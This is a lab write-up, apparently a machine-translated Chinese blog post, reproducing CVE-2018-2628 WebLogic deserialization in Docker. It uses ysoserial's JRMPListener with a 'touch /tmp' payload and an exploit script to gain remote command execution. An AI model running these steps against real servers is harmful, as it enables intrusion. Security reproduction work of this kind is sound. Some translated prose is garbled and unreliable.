weblogic (reproducción de vulnerabilidades CVE-2018-2628)

0. Primero mencione algunos conceptos

JRMP: protocolo de método remoto de Java, protocolo de método remoto de Java
JRMP es el objeto específico del protocolo de tecnología Java para la esperanza y la referencia remota. JRMP solo puede ser un protocolo basado en flujo específico de Java. En comparación con RMI-IIOP, el protocolo JRMP solo puede ser una llamada remota de Java a Java de un objeto, lo que lo hace dependiente del idioma, lo que significa que el cliente y el servidor deben usar Java.
JRMP: Protocolo de mensajería remota de Java JRMP (Protocolo de mensajería remota de Java) se
basa en TCP / IP. Dado que es un protocolo de intercambio de información, debe haber dos puntos finales, recepción y envío. JRMPListener se puede entender aproximadamente como el remitente, lo que significa en este experimento Para comunicarse con el puerto 1099 en la máquina atacante y 7001 en la máquina objetivo de weblogic para lograr el propósito de la ejecución remota del comando.

Inserte la descripción de la imagen aquí
1. Instale el entorno de destino

docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain

#Aquí usa directamente el entorno configurado por el jefe

Inserte la descripción de la imagen aquí
2. Ejecute el comando en el host JRMPListener

La ventana acoplable Ubuntu16.04 + se usa aquí, y el contenedor de la ventana acoplable se usa como la máquina de destino de weblogic. El host JRMPListener aquí se refiere a Ubuntu16.04.

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/sss666.txt'
#'touch /tmp/sss666.txt'为我想执行的命令,1099是JRMP Server监听的端口。

Inserte la descripción de la imagen aquí
La ip de 172.17.0.2 en la figura es la ip de la máquina de destino de la ventana acoplable
3. Ejecute el script de explotación

python exploit.py 172.17.0.2 7001 ../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.185.43.215 1099 JRMPClien
#172.17.0.2 7001是weblogic靶机的IP和端口
#../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 是ysoserial的本地路径根据自己真实路径填写
#10.185.43.215 1099的JRMP 一端的IP地址和端口
#JRMPClien是执行JRMPClient的类

Inserte la descripción de la imagen aquí
4. Ingrese a la máquina de destino de la ventana acoplable para verificar si el archivo se creó correctamente

docker exec -ti determined_stonebrak /bin/bash
#determined_stonebrak是我的docker靶机的名字,每个人创建的名字都不一样可使用docker ps查看NAME 
ls /tmp/

Inserte la descripción de la imagen aquí

Supongo que te gusta

Origin blog.csdn.net/weixin_44110913/article/details/109539427
Recomendado
Clasificación